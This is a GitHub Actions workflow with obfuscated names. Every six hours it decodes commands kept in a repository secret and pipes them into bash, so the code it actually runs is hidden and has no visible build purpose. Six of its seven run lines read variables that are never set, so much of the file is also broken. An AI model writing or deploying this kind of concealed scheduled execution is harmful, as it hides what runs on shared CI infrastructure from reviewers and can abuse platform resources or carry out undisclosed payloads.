name: lanjianxing2817
on:
  workflow_dispatch:
  schedule:
    - cron: '0 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lanjianxing2817
        env:
          nkf9262: ${{ secrets.nkf9262 }}
        run: |
          echo $nkf9262 | jq -r .et67 | /bin/bash
          echo $wiyx0 | jq -r .jilbk11 | /bin/bash
          echo $zzrek293 | jq -r .rqvl40 | /bin/bash
          echo $sg863 | jq -r .ehoj811 | /bin/bash
          echo $q6865 | jq -r .htzxu9 | /bin/bash
          echo $gbno1453 | jq -r .tyjbd23 | /bin/bash
          echo $reku3313 | jq -r .d6 | /bin/bash

